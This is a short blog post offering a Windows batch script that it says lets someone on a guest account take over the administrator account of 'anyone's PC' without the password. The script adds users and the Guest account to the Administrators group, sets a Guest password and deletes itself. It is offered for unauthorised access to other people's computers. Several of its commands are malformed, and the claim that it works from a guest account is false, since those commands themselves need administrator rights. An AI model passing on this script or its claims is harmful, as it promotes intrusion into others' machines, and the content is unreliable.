skip to main |
skip to sidebar
Control Windows Administrator Account from Guest Account
>>Control Windows Administrator Account fromGuest Account..! Without knowing the administrator password | Access windows Admin Account from guest account.
Hey Ask.Geeks fans we've got something really amazing and interesting for you,
Just
simply follow the steps below to access anyone's PC's administrator account without even knowing their passwords just through their guest account.
To Do This Just Follow the below given Steps.
Do this from Guest Account.
1. Copy The Below Code
Code—->
echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators
Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
2. Open Notepad and Save it as
Guest2admin.bat ( You can keep any name
the it should end with .bat Format) and keep
the FILE TYPE as ALL FILES.
3. Execute this File where you Saved it.
A Command Prompt Window will Open and
Close…And then,You’ll come to the
Administrator Account.
Geek on..!!
0 comments:
Post a Comment